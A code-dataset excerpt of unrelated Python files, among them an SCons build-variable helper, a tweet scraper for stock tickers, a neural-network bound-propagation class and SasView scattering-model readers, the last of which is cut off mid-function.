id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
18096
|
<reponame>Relintai/pandemonium_engine
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Variable type for package Variables.
To be used whenever a 'package' may be enabled/disabled and the
package path may be specified.
Given these options ::
x11=no (disables X11 support)
x11=yes (will search for the package installation dir)
x11=/usr/local/X11 (will check this path for existence)
Can be used as a replacement for autoconf's ``--with-xxx=yyy`` ::
opts = Variables()
opts.Add(
PackageVariable(
key='x11',
help='use X11 installed here (yes = search some places)',
default='yes'
)
)
...
if env['x11'] == True:
dir = ... # search X11 in some standard places ...
env['x11'] = dir
if env['x11']:
... # build with x11 ...
"""
from typing import Tuple, Callable
import SCons.Errors
__all__ = ['PackageVariable',]
ENABLE_STRINGS = ('1', 'yes', 'true', 'on', 'enable', 'search')
DISABLE_STRINGS = ('0', 'no', 'false', 'off', 'disable')
def _converter(val):
""" """
lval = val.lower()
if lval in ENABLE_STRINGS:
return True
if lval in DISABLE_STRINGS:
return False
return val
def _validator(key, val, env, searchfunc) -> None:
""" """
# NB: searchfunc is currently undocumented and unsupported
# TODO write validator, check for path
import os
if env[key] is True:
if searchfunc:
env[key] = searchfunc(key, val)
elif env[key] and not os.path.exists(val):
raise SCons.Errors.UserError(
'Path does not exist for option %s: %s' % (key, val))
def PackageVariable(key, help, default, searchfunc=None) -> Tuple[str, str, str, Callable, Callable]:
"""Return a tuple describing a package list SCons Variable.
The input parameters describe a 'package list' option. Returns
a tuple including the correct converter and validator appended.
The result is usable as input to :meth:`Add` .
A 'package list' option may either be 'all', 'none' or a pathname
string. This information is appended to *help*.
"""
# NB: searchfunc is currently undocumented and unsupported
help = '\n '.join(
(help, '( yes | no | /path/to/%s )' % key))
return (key, help, default,
lambda k, v, e: _validator(k, v, e, searchfunc),
_converter)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
StarcoderdataPython
|
117333
|
<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
from skimage import draw
from scipy.ndimage import label, morphology
import copy
import time
import skimage as sk
import matplotlib as mpl
import plotting
mpl.rcParams['figure.dpi'] = 300
def pixellines_to_ordered_points(matrix, half_tile):
# break guidelines into chains and order the pixel for all chain
# import cv2
# chains3 = []
matrix = sk.morphology.skeletonize(matrix) # nicer lines, better results
matrix_labeled, chain_count = label(matrix, structure=[[1,1,1], [1,1,1], [1,1,1]]) # find chains
chains = []
for i_chain in range(1,chain_count):
pixel = copy.deepcopy(matrix_labeled)
pixel[pixel!=i_chain] = 0
# alternative using openCV results results in closed chains (might be better), but a few chains are missing
# hierarchy,contours = cv2.findContours(pixel.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# for h in hierarchy:
# h2 = h.reshape((-1,2))
# h3 = [list(xy)[::-1] for xy in h2]
# if len(h3)>3:
# chains3 += [ h3 ]
while True:
points = np.argwhere(pixel!=0)
if len(points)==0: break
x,y = points[0] # set starting point
done = False
subchain = []
while not done:
subchain += [[x,y]]
pixel[x,y] = 0
done = True
for dx,dy in [(+1,0),(-1,0),(+1,-1),(-1,+1),(0,-1,),(0,+1),(-1,-1),(+1,+1)]:
if x+dx>=0 and x+dx<pixel.shape[0] and y+dy>=0 and y+dy<pixel.shape[1]: # prüfen ob im Bild drin
if pixel[x+dx,y+dy]>0: # check for pixel here
x,y = x+dx, y+dy # if yes, jump here
done = False # tell the middle loop that the chain is not finished
break # break inner loop
if len(subchain)>half_tile//2:
chains += [subchain]
return chains
def chains_and_angles(img_edges, half_tile, plot=[]):
# for each pixel get distance to closest edge
distances = morphology.distance_transform_edt(img_edges==0,)
# tiles will be placed centered along guidelines (closed lines)
""" tile
xxxxxx
xxxxxx
---------------------- guideline
xxxxxx
xxxxxx
"""
w,h = img_edges.shape[0],img_edges.shape[1]
guidelines = np.zeros((w, h), dtype=np.uint8)
mask = ( (distances.astype(int)+half_tile) % (2*half_tile)==0)
guidelines[mask] = 1
# break into chains and order the points
t0 = time.time()
chains = pixellines_to_ordered_points(guidelines, half_tile)
print ('Pixel guidelines to chains with sorted points:', f'{time.time()-t0:.1f}s')
# use distances to calculate gradients => rotation of tiles when placed later
t0 = time.time()
gradient = np.zeros((w,h))
for x in range(1,w-1):
for y in range(1,h-1):
numerator = distances[x,y+1]-distances[x,y-1]
denominator = distances[x+1,y]-distances[x-1,y]
gradient[x,y] = np.arctan2(numerator, denominator)
angles_0to180 = (gradient*180/np.pi+180) % 180
print ('Calculation of angle matrix:', f'{time.time()-t0:.1f}s')
# Remark: it would be enough to calculate only x,y inside the chain => faster
# interim_stages = dict(distances=distances, guidelines=guidelines, chains=chains,
# gradient=gradient, angles_0to180=angles_0to180)
if 'distances' in plot: plotting.plot_image(distances, title='distances')
if 'guidelines' in plot: plotting.plot_image(guidelines, inverted=True, title='guidelines')
if 'gradient' in plot: plotting.plot_image(gradient, title='gradients')
if 'angles_0to180' in plot: plotting.plot_image(angles_0to180)
return chains, angles_0to180#, interim_stages
def chains_into_gaps(polygons, h, w, half_tile, CHAIN_SPACING, plot=[]):
# get area which are already occupied
img_chains = np.zeros((h, w), dtype=np.uint8)
for p in polygons:
y,x = p.exterior.coords.xy
rr, cc = draw.polygon(x, y, shape=img_chains.shape)
img_chains[rr, cc] = 1
distance_to_tile = morphology.distance_transform_edt(img_chains==0)
d = distance_to_tile.astype(int)
# define new guidelines
chain_spacing = int(round(half_tile*CHAIN_SPACING))
if chain_spacing <= 1: # would select EVERY pixel inside gap
chain_spacing = 2
# first condition (d==1) => chains around all (even the smallest) gap borders
# (set e.g. d==2 for faster calculations)
# second condition (...) => more chains inside larger gaps
mask = (d==1) | ( (d%chain_spacing==0) & (d>0) )
guidelines2 = np.zeros((h, w), dtype=np.uint8)
guidelines2[mask] = 1
chains2 = pixellines_to_ordered_points(guidelines2, half_tile)
if 'used_up_space' in plot: plotting.plot_image(img_chains, title='gaps')
if 'distance_to_tile' in plot: plotting.plot_image(distance_to_tile, inverted=True)
if 'filler_guidelines' in plot: plotting.plot_image(guidelines2, inverted=True, title='new guidelines')
return chains2
if __name__ == '__main__':
img = sk.data.coffee()
import edges
img_edges = edges.edges_diblasi(img)
img_edges = edges.edges_hed(img, gauss=0)
chains, angles_0to180 = chains_and_angles(img_edges, half_tile=10)
|
StarcoderdataPython
|
3403438
|
import numpy as np
def load_spectrum(spectrum_path, lambda_min=100, lambda_max=1000,
delimiter=','):
"""
Load a spectrum file.
Parameters
----------
spectrum_path : string
File path.
lambda_min : scalar, optional
Cut the data at this minimum wavelength in nm.
lambda_max : scalar, optional
Cut the data at this maximum wavelength in nm.
delimiter : string, optional
Delimiter between columns in the datafile.
Returns
-------
values : arrays
(lamdbas, intensities)
"""
data = np.loadtxt(spectrum_path, delimiter=delimiter)
lambdas, intensities = np.column_stack(data)
mask = (lambdas > lambda_min) & (lambdas < lambda_max)
return lambdas[mask], intensities[mask]
|
StarcoderdataPython
|
1651284
|
# coding=utf-8
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fast-Lin bound calculation for common neural network layers.
The Fast-Lin algorithm expresses lower and upper bounds of each layer of
a neural network as a symbolic linear expression in the input neurons,
relaxing the ReLU layers to retain linearity at the expense of tightness.
Reference: "Towards Fast Computation of Certified Robustness for ReLU Networks",
https://arxiv.org/pdf/1804.09699.pdf.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from deep_verify.src.bounds import layer_bounds
import interval_bound_propagation as ibp
class FastlinBoundPropagation(layer_bounds.BoundPropagation):
"""Method for propagating symbolic bounds in multiple passes."""
def __init__(self, num_rounds=1, best_with_naive=False):
super(FastlinBoundPropagation, self).__init__()
self._num_rounds = num_rounds
self._best_with_naive = best_with_naive
def propagate_bounds(self, network, in_bounds):
if self._best_with_naive:
# Initial round of interval bound propagation.
super(FastlinBoundPropagation, self).propagate_bounds(network, in_bounds)
for _ in range(self._num_rounds):
# Construct symbolic bounds and propagate them.
super(FastlinBoundPropagation, self).propagate_bounds(
network, ibp.RelativeSymbolicBounds.convert(in_bounds))
|
StarcoderdataPython
|
5103468
|
import re
import pandas as pd
import snscrape.modules.twitter as sntwitter
maxTweets = 1000
tweets = []
keywords = ['TSLA', 'NVDA']
start = '2022-02-01'
end = '2022-02-02'
def clean_text(text):
text = re.sub("@[A-Za-z0-9]+", '', text)
text = re.sub("#[A-Za-z0-9_]+", '', text)
text = re.sub("https?://S+", '', text)
text = re.sub(r"http\S+", '', text)
text = re.sub(r"www.\S+", '', text)
text = re.sub(r'[.*?]', '', text)
text = re.sub('[()!?]', '', text)
text = re.sub("\\d+\\w*\\d*", '', text)
text = re.sub("[^\x01-\x7F]", '', text) # remove emotions
return text
for keyword in keywords:
query = f'${keyword} since:{start} until:{end} lang:en'
for i, tweet in enumerate(sntwitter.TwitterSearchScraper(query).get_items()):
if i > maxTweets:
break
totalMentions = 0
if tweet.mentionedUsers is not None:
totalMentions = len(tweet.mentionedUsers)
content = [keyword, clean_text(tweet.content),
tweet.replyCount, tweet.retweetCount, tweet.likeCount, tweet.quoteCount,
totalMentions]
tweets.append(content)
# Creating a dataframe from the tweets list above
columns = ['Ticker', 'Text', 'replyCount', 'retweetCount', 'likeCount', 'quoteCount', 'mentionedUsers']
tweets_df2 = pd.DataFrame(tweets, columns=columns)
tweets_df3 = tweets_df2.drop_duplicates(subset='Text', keep="last")
tweets_df3.to_csv('data/stock_tweets_simple.csv', sep=',', index=False)
|
StarcoderdataPython
|
6614353
|
<filename>backend/sensors/Sensor.py<gh_stars>1-10
from Bluetin_Echo import Echo
class Sensor:
def __init__(self, trigger_pin, echo_pin, angle):
self._trigger_pin = trigger_pin
self._echo_pin = echo_pin
self._angle = angle
self._sr04 = Echo(self._trigger_pin, self._echo_pin)
def getDistance(self, samples = 1):
return self._sr04.read('cm', samples)
def getAngle(self):
return self._angle
def getTriggerPin(self):
return self._trigger_pin
def getEchoPin(self):
return self._echo_pin
def stop(self):
self._sr04.stop()
|
StarcoderdataPython
|
3497058
|
from datetime import datetime
from functools import reduce
from typing import List
DESIRED_QUOTE_KEYS = [
"bid_price",
"ask_price",
"bid_size",
"ask_size",
"updated_at",
"last_trade_price",
"last_extended_hours_trade_price",
]
def pluck(keys: List[str], dictionary: dict) -> dict:
def pluck_inner(acc: dict, pair) -> dict:
(key, value) = pair
return {**acc, key: value} if key in keys else acc
return reduce(pluck_inner, dictionary.items(), {})
UPDATED_AT_TIME_FORMAT_STRING = "%Y-%m-%dT%H:%M:%SZ"
def parse_updated_at(updated_at: str) -> datetime:
return datetime.strptime(updated_at, UPDATED_AT_TIME_FORMAT_STRING)
INSTRUMENT_ID_RGX = r"https://api.robinhood.com/instruments/(.+?)/"
def parse_instrument_url(instrument_url: str) -> str:
return instrument_url.split("instruments/")[1][:-1]
def build_instrument_url(instrument_id: str) -> str:
return f"https://api.robinhood.com/instruments/{instrument_id}/"
def omit(k, d: dict) -> dict:
new_d = {**d}
new_d.__delitem__(k)
return new_d
|
StarcoderdataPython
|
8023591
|
<reponame>teodoramilcheva/softuni-software-engineering
from project.motorcycle import Motorcycle
class CrossMotorcycle(Motorcycle):
pass
|
StarcoderdataPython
|
11366268
|
<filename>hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/solution-2.py
def main():
n, m = map(int, raw_input().split())
roads = map(lambda _ : map(int, raw_input().split()), range(0, m))
v = [0] * n
for i, j in roads:
if i != j:
v[i - 1] = 1
v[j - 1] = 1
design_score = reduce(lambda x, y : x + y, v)
print design_score
if __name__ == '__main__':
main()
# notes:
# very simple approach
# make a single pass through the road list and detect all nodes that have edges (roads) from it
# those nodes (stations) will have a path going another node and coming back (hence, length of at least 2)
# count those nodes
#
# score: 24 (failures: errors)
|
StarcoderdataPython
|
4830241
|
<reponame>limeonion/Python-Programming
'''
url= https://www.hackerrank.com/challenges/python-tuples/problem?h_r=next-challenge&h_v=zen
'''
n = int(input())
integer_list = map(int, input().split())
print(hash(tuple(integer_list)))
|
StarcoderdataPython
|
9684657
|
# pylint: disable=invalid-name
"""
SAS generic computation and sld file readers
"""
from __future__ import print_function
import os
import sys
import copy
import logging
from periodictable import formula
from periodictable import nsf
import numpy as np
from . import _sld2i
from .BaseComponent import BaseComponent
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
def decode(s):
return s
else:
def decode(s):
return s.decode() if isinstance(s, bytes) else s
MFACTOR_AM = 2.853E-12
MFACTOR_MT = 2.3164E-9
METER2ANG = 1.0E+10
#Avogadro constant [1/mol]
NA = 6.02214129e+23
def mag2sld(mag, v_unit=None):
"""
Convert magnetization to magnatic SLD
sldm = Dm * mag where Dm = gamma * classical elec. radius/(2*Bohr magneton)
Dm ~ 2.853E-12 [A^(-2)] ==> Shouldn't be 2.90636E-12 [A^(-2)]???
"""
if v_unit == "A/m":
factor = MFACTOR_AM
elif v_unit == "mT":
factor = MFACTOR_MT
else:
raise ValueError("Invalid valueunit")
sld_m = factor * mag
return sld_m
def transform_center(pos_x, pos_y, pos_z):
"""
re-center
:return: posx, posy, posz [arrays]
"""
posx = pos_x - (min(pos_x) + max(pos_x)) / 2.0
posy = pos_y - (min(pos_y) + max(pos_y)) / 2.0
posz = pos_z - (min(pos_z) + max(pos_z)) / 2.0
return posx, posy, posz
class GenSAS(BaseComponent):
"""
Generic SAS computation Model based on sld (n & m) arrays
"""
def __init__(self):
"""
Init
:Params sld_data: MagSLD object
"""
# Initialize BaseComponent
BaseComponent.__init__(self)
self.sld_data = None
self.data_pos_unit = None
self.data_x = None
self.data_y = None
self.data_z = None
self.data_sldn = None
self.data_mx = None
self.data_my = None
self.data_mz = None
self.data_vol = None #[A^3]
self.is_avg = False
## Name of the model
self.name = "GenSAS"
## Define parameters
self.params = {}
self.params['scale'] = 1.0
self.params['background'] = 0.0
self.params['solvent_SLD'] = 0.0
self.params['total_volume'] = 1.0
self.params['Up_frac_in'] = 1.0
self.params['Up_frac_out'] = 1.0
self.params['Up_theta'] = 0.0
self.description = 'GenSAS'
## Parameter details [units, min, max]
self.details = {}
self.details['scale'] = ['', 0.0, np.inf]
self.details['background'] = ['[1/cm]', 0.0, np.inf]
self.details['solvent_SLD'] = ['1/A^(2)', -np.inf, np.inf]
self.details['total_volume'] = ['A^(3)', 0.0, np.inf]
self.details['Up_frac_in'] = ['[u/(u+d)]', 0.0, 1.0]
self.details['Up_frac_out'] = ['[u/(u+d)]', 0.0, 1.0]
self.details['Up_theta'] = ['[deg]', -np.inf, np.inf]
# fixed parameters
self.fixed = []
def set_pixel_volumes(self, volume):
"""
Set the volume of a pixel in (A^3) unit
:Param volume: pixel volume [float]
"""
if self.data_vol is None:
raise TypeError("data_vol is missing")
self.data_vol = volume
def set_is_avg(self, is_avg=False):
"""
Sets is_avg: [bool]
"""
self.is_avg = is_avg
def _gen(self, qx, qy):
"""
Evaluate the function
:Param x: array of x-values
:Param y: array of y-values
:Param i: array of initial i-value
:return: function value
"""
pos_x = self.data_x
pos_y = self.data_y
pos_z = self.data_z
if self.is_avg is None:
pos_x, pos_y, pos_z = transform_center(pos_x, pos_y, pos_z)
sldn = copy.deepcopy(self.data_sldn)
sldn -= self.params['solvent_SLD']
# **** WARNING **** new_GenI holds pointers to numpy vectors
# be sure that they are contiguous double precision arrays and make
# sure the GC doesn't eat them before genicom is called.
# TODO: rewrite so that the parameters are passed directly to genicom
args = (
(1 if self.is_avg else 0),
pos_x, pos_y, pos_z,
sldn, self.data_mx, self.data_my,
self.data_mz, self.data_vol,
self.params['Up_frac_in'],
self.params['Up_frac_out'],
self.params['Up_theta'])
model = _sld2i.new_GenI(*args)
if len(qy):
qx, qy = _vec(qx), _vec(qy)
I_out = np.empty_like(qx)
#print("npoints", qx.shape, "npixels", pos_x.shape)
_sld2i.genicomXY(model, qx, qy, I_out)
#print("I_out after", I_out)
else:
qx = _vec(qx)
I_out = np.empty_like(qx)
_sld2i.genicom(model, qx, I_out)
vol_correction = self.data_total_volume / self.params['total_volume']
result = (self.params['scale'] * vol_correction * I_out
+ self.params['background'])
return result
def set_sld_data(self, sld_data=None):
"""
Sets sld_data
"""
self.sld_data = sld_data
self.data_pos_unit = sld_data.pos_unit
self.data_x = _vec(sld_data.pos_x)
self.data_y = _vec(sld_data.pos_y)
self.data_z = _vec(sld_data.pos_z)
self.data_sldn = _vec(sld_data.sld_n)
self.data_mx = _vec(sld_data.sld_mx)
self.data_my = _vec(sld_data.sld_my)
self.data_mz = _vec(sld_data.sld_mz)
self.data_vol = _vec(sld_data.vol_pix)
self.data_total_volume = sum(sld_data.vol_pix)
self.params['total_volume'] = sum(sld_data.vol_pix)
def getProfile(self):
"""
Get SLD profile
: return: sld_data
"""
return self.sld_data
def run(self, x=0.0):
"""
Evaluate the model
:param x: simple value
:return: (I value)
"""
if isinstance(x, list):
if len(x[1]) > 0:
msg = "Not a 1D."
raise ValueError(msg)
# 1D I is found at y =0 in the 2D pattern
out = self._gen(x[0], [])
return out
else:
msg = "Q must be given as list of qx's and qy's"
raise ValueError(msg)
def runXY(self, x=0.0):
"""
Evaluate the model
:param x: simple value
:return: I value
:Use this runXY() for the computation
"""
if isinstance(x, list):
return self._gen(x[0], x[1])
else:
msg = "Q must be given as list of qx's and qy's"
raise ValueError(msg)
def evalDistribution(self, qdist):
"""
Evaluate a distribution of q-values.
:param qdist: ndarray of scalar q-values (for 1D) or list [qx,qy]
where qx,qy are 1D ndarrays (for 2D).
"""
if isinstance(qdist, list):
return self.run(qdist) if len(qdist[1]) < 1 else self.runXY(qdist)
else:
mesg = "evalDistribution is expecting an ndarray of "
mesg += "a list [qx,qy] where qx,qy are arrays."
raise RuntimeError(mesg)
def _vec(v):
return np.ascontiguousarray(v, 'd')
class OMF2SLD(object):
"""
Convert OMFData to MAgData
"""
def __init__(self):
"""
Init
"""
self.pos_x = None
self.pos_y = None
self.pos_z = None
self.mx = None
self.my = None
self.mz = None
self.sld_n = None
self.vol_pix = None
self.output = None
self.omfdata = None
def set_data(self, omfdata, shape='rectangular'):
"""
Set all data
"""
self.omfdata = omfdata
length = int(omfdata.xnodes * omfdata.ynodes * omfdata.znodes)
pos_x = np.arange(omfdata.xmin,
omfdata.xnodes*omfdata.xstepsize + omfdata.xmin,
omfdata.xstepsize)
pos_y = np.arange(omfdata.ymin,
omfdata.ynodes*omfdata.ystepsize + omfdata.ymin,
omfdata.ystepsize)
pos_z = np.arange(omfdata.zmin,
omfdata.znodes*omfdata.zstepsize + omfdata.zmin,
omfdata.zstepsize)
self.pos_x = np.tile(pos_x, int(omfdata.ynodes * omfdata.znodes))
self.pos_y = pos_y.repeat(int(omfdata.xnodes))
self.pos_y = np.tile(self.pos_y, int(omfdata.znodes))
self.pos_z = pos_z.repeat(int(omfdata.xnodes * omfdata.ynodes))
self.mx = omfdata.mx
self.my = omfdata.my
self.mz = omfdata.mz
self.sld_n = np.zeros(length)
if omfdata.mx is None:
self.mx = np.zeros(length)
if omfdata.my is None:
self.my = np.zeros(length)
if omfdata.mz is None:
self.mz = np.zeros(length)
self._check_data_length(length)
self.remove_null_points(False, False)
mask = np.ones(len(self.sld_n), dtype=bool)
if shape.lower() == 'ellipsoid':
try:
# Pixel (step) size included
x_c = max(self.pos_x) + min(self.pos_x)
y_c = max(self.pos_y) + min(self.pos_y)
z_c = max(self.pos_z) + min(self.pos_z)
x_d = max(self.pos_x) - min(self.pos_x)
y_d = max(self.pos_y) - min(self.pos_y)
z_d = max(self.pos_z) - min(self.pos_z)
x_r = (x_d + omfdata.xstepsize) / 2.0
y_r = (y_d + omfdata.ystepsize) / 2.0
z_r = (z_d + omfdata.zstepsize) / 2.0
x_dir2 = ((self.pos_x - x_c / 2.0) / x_r)
x_dir2 *= x_dir2
y_dir2 = ((self.pos_y - y_c / 2.0) / y_r)
y_dir2 *= y_dir2
z_dir2 = ((self.pos_z - z_c / 2.0) / z_r)
z_dir2 *= z_dir2
mask = (x_dir2 + y_dir2 + z_dir2) <= 1.0
except Exception as exc:
logger.error(exc)
self.output = MagSLD(self.pos_x[mask], self.pos_y[mask],
self.pos_z[mask], self.sld_n[mask],
self.mx[mask], self.my[mask], self.mz[mask])
self.output.set_pix_type('pixel')
self.output.set_pixel_symbols('pixel')
def get_omfdata(self):
"""
Return all data
"""
return self.omfdata
def get_output(self):
"""
Return output
"""
return self.output
def _check_data_length(self, length):
"""
Check if the data lengths are consistent
:Params length: data length
"""
parts = (self.pos_x, self.pos_y, self.pos_z, self.mx, self.my, self.mz)
if any(len(v) != length for v in parts):
raise ValueError("Error: Inconsistent data length.")
def remove_null_points(self, remove=False, recenter=False):
"""
Removes any mx, my, and mz = 0 points
"""
if remove:
is_nonzero = (np.fabs(self.mx) + np.fabs(self.my) +
np.fabs(self.mz)).nonzero()
if len(is_nonzero[0]) > 0:
self.pos_x = self.pos_x[is_nonzero]
self.pos_y = self.pos_y[is_nonzero]
self.pos_z = self.pos_z[is_nonzero]
self.sld_n = self.sld_n[is_nonzero]
self.mx = self.mx[is_nonzero]
self.my = self.my[is_nonzero]
self.mz = self.mz[is_nonzero]
if recenter:
self.pos_x -= (min(self.pos_x) + max(self.pos_x)) / 2.0
self.pos_y -= (min(self.pos_y) + max(self.pos_y)) / 2.0
self.pos_z -= (min(self.pos_z) + max(self.pos_z)) / 2.0
def get_magsld(self):
"""
return MagSLD
"""
return self.output
class OMFReader(object):
"""
Class to load omf/ascii files (3 columns w/header).
"""
## File type
type_name = "OMF ASCII"
## Wildcards
type = ["OMF files (*.OMF, *.omf)|*.omf"]
## List of allowed extensions
ext = ['.omf', '.OMF']
def read(self, path):
"""
Load data file
:param path: file path
:return: x, y, z, sld_n, sld_mx, sld_my, sld_mz
"""
desc = ""
mx = np.zeros(0)
my = np.zeros(0)
mz = np.zeros(0)
try:
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
output = OMFData()
valueunit = None
for line in lines:
line = line.strip()
# Read data
if line and not line.startswith('#'):
try:
toks = line.split()
_mx = float(toks[0])
_my = float(toks[1])
_mz = float(toks[2])
_mx = mag2sld(_mx, valueunit)
_my = mag2sld(_my, valueunit)
_mz = mag2sld(_mz, valueunit)
mx = np.append(mx, _mx)
my = np.append(my, _my)
mz = np.append(mz, _mz)
except Exception as exc:
# Skip non-data lines
logger.error(str(exc)+" when processing %r"%line)
#Reading Header; Segment count ignored
s_line = line.split(":", 1)
if s_line[0].lower().count("oommf") > 0:
oommf = s_line[1].lstrip()
if s_line[0].lower().count("title") > 0:
title = s_line[1].lstrip()
if s_line[0].lower().count("desc") > 0:
desc += s_line[1].lstrip()
desc += '\n'
if s_line[0].lower().count("meshtype") > 0:
meshtype = s_line[1].lstrip()
if s_line[0].lower().count("meshunit") > 0:
meshunit = s_line[1].lstrip()
if meshunit.count("m") < 1:
msg = "Error: \n"
msg += "We accept only m as meshunit"
raise ValueError(msg)
if s_line[0].lower().count("xbase") > 0:
xbase = s_line[1].lstrip()
if s_line[0].lower().count("ybase") > 0:
ybase = s_line[1].lstrip()
if s_line[0].lower().count("zbase") > 0:
zbase = s_line[1].lstrip()
if s_line[0].lower().count("xstepsize") > 0:
xstepsize = s_line[1].lstrip()
if s_line[0].lower().count("ystepsize") > 0:
ystepsize = s_line[1].lstrip()
if s_line[0].lower().count("zstepsize") > 0:
zstepsize = s_line[1].lstrip()
if s_line[0].lower().count("xnodes") > 0:
xnodes = s_line[1].lstrip()
if s_line[0].lower().count("ynodes") > 0:
ynodes = s_line[1].lstrip()
if s_line[0].lower().count("znodes") > 0:
znodes = s_line[1].lstrip()
if s_line[0].lower().count("xmin") > 0:
xmin = s_line[1].lstrip()
if s_line[0].lower().count("ymin") > 0:
ymin = s_line[1].lstrip()
if s_line[0].lower().count("zmin") > 0:
zmin = s_line[1].lstrip()
if s_line[0].lower().count("xmax") > 0:
xmax = s_line[1].lstrip()
if s_line[0].lower().count("ymax") > 0:
ymax = s_line[1].lstrip()
if s_line[0].lower().count("zmax") > 0:
zmax = s_line[1].lstrip()
if s_line[0].lower().count("valueunit") > 0:
valueunit = s_line[1].lstrip().rstrip()
if s_line[0].lower().count("valuemultiplier") > 0:
valuemultiplier = s_line[1].lstrip()
if s_line[0].lower().count("valuerangeminmag") > 0:
valuerangeminmag = s_line[1].lstrip()
if s_line[0].lower().count("valuerangemaxmag") > 0:
valuerangemaxmag = s_line[1].lstrip()
if s_line[0].lower().count("end") > 0:
output.filename = os.path.basename(path)
output.oommf = oommf
output.title = title
output.desc = desc
output.meshtype = meshtype
output.xbase = float(xbase) * METER2ANG
output.ybase = float(ybase) * METER2ANG
output.zbase = float(zbase) * METER2ANG
output.xstepsize = float(xstepsize) * METER2ANG
output.ystepsize = float(ystepsize) * METER2ANG
output.zstepsize = float(zstepsize) * METER2ANG
output.xnodes = float(xnodes)
output.ynodes = float(ynodes)
output.znodes = float(znodes)
output.xmin = float(xmin) * METER2ANG
output.ymin = float(ymin) * METER2ANG
output.zmin = float(zmin) * METER2ANG
output.xmax = float(xmax) * METER2ANG
output.ymax = float(ymax) * METER2ANG
output.zmax = float(zmax) * METER2ANG
output.valuemultiplier = valuemultiplier
output.valuerangeminmag = mag2sld(float(valuerangeminmag), \
valueunit)
output.valuerangemaxmag = mag2sld(float(valuerangemaxmag), \
valueunit)
output.set_m(mx, my, mz)
return output
except Exception:
msg = "%s is not supported: \n" % path
msg += "We accept only Text format OMF file."
raise RuntimeError(msg)
class PDBReader(object):
"""
PDB reader class: limited for reading the lines starting with 'ATOM'
"""
type_name = "PDB"
## Wildcards
type = ["pdb files (*.PDB, *.pdb)|*.pdb"]
## List of allowed extensions
ext = ['.pdb', '.PDB']
def read(self, path):
"""
Load data file
:param path: file path
:return: MagSLD
:raise RuntimeError: when the file can't be opened
"""
pos_x = np.zeros(0)
pos_y = np.zeros(0)
pos_z = np.zeros(0)
sld_n = np.zeros(0)
sld_mx = np.zeros(0)
sld_my = np.zeros(0)
sld_mz = np.zeros(0)
vol_pix = np.zeros(0)
pix_symbol = np.zeros(0)
x_line = []
y_line = []
z_line = []
x_lines = []
y_lines = []
z_lines = []
try:
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
num = 0
for line in lines:
try:
# check if line starts with "ATOM"
if line[0:6].strip().count('ATM') > 0 or \
line[0:6].strip() == 'ATOM':
# define fields of interest
atom_name = line[12:16].strip()
try:
float(line[12])
atom_name = atom_name[1].upper()
except Exception:
if len(atom_name) == 4:
atom_name = atom_name[0].upper()
elif line[12] != ' ':
atom_name = atom_name[0].upper() + \
atom_name[1].lower()
else:
atom_name = atom_name[0].upper()
_pos_x = float(line[30:38].strip())
_pos_y = float(line[38:46].strip())
_pos_z = float(line[46:54].strip())
pos_x = np.append(pos_x, _pos_x)
pos_y = np.append(pos_y, _pos_y)
pos_z = np.append(pos_z, _pos_z)
try:
val = nsf.neutron_sld(atom_name)[0]
# sld in Ang^-2 unit
val *= 1.0e-6
sld_n = np.append(sld_n, val)
atom = formula(atom_name)
# cm to A units
vol = 1.0e+24 * atom.mass / atom.density / NA
vol_pix = np.append(vol_pix, vol)
except Exception:
logger.error("Error: set the sld of %s to zero"% atom_name)
sld_n = np.append(sld_n, 0.0)
sld_mx = np.append(sld_mx, 0)
sld_my = np.append(sld_my, 0)
sld_mz = np.append(sld_mz, 0)
pix_symbol = np.append(pix_symbol, atom_name)
elif line[0:6].strip().count('CONECT') > 0:
toks = line.split()
num = int(toks[1]) - 1
val_list = []
for val in toks[2:]:
try:
int_val = int(val)
except Exception:
break
if int_val == 0:
break
val_list.append(int_val)
#need val_list ordered
for val in val_list:
index = val - 1
if (pos_x[index], pos_x[num]) in x_line and \
(pos_y[index], pos_y[num]) in y_line and \
(pos_z[index], pos_z[num]) in z_line:
continue
x_line.append((pos_x[num], pos_x[index]))
y_line.append((pos_y[num], pos_y[index]))
z_line.append((pos_z[num], pos_z[index]))
if len(x_line) > 0:
x_lines.append(x_line)
y_lines.append(y_line)
z_lines.append(z_line)
except Exception as exc:
logger.error(exc)
output = MagSLD(pos_x, pos_y, pos_z, sld_n, sld_mx, sld_my, sld_mz)
output.set_conect_lines(x_line, y_line, z_line)
output.filename = os.path.basename(path)
output.set_pix_type('atom')
